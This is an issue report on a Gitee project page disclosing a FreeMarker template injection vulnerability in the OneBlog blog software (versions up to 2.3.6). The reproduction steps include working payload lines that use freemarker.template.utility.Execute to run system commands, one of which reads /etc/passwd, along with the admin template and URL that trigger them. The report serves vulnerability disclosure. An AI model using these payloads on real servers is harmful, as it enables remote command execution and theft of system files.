556 Star 5.2K Fork 2.1K

yadong.zhang/OneBlog

 / 详情

OneBlog <=v2.3.6 Template injection vulnerability exists

待办的
创建于  
2024-11-21 18:01
  1. Reference the spring-boot-starter-freemarker component in the blog-core/pom.xml file.
    输入图片说明

  2. The vulnerability point is in the backend website management-template management department. Find the TM_SITEMAP_HTML file and write it into the POC.

<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
<#assign value="freemarker.template.utility.Execute"?new()>${value("cat /etc/passwd")}


输入图片说明

3.After saving, visit the homepage to find the site map below and click to trigger. You can also directly access /sitemap.html to trigger the vulnerability.
输入图片说明
输入图片说明
输入图片说明
输入图片说明

评论 (0)

kaoniniang 创建了任务 4个月前
kaoniniang 修改了描述 4个月前
kaoniniang 修改了描述 4个月前
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
kaoniniang-kaoniniang
Java
1
https://gitee.com/yadong.zhang/DBlog.git
git@gitee.com:yadong.zhang/DBlog.git
yadong.zhang
DBlog
OneBlog

搜索帮助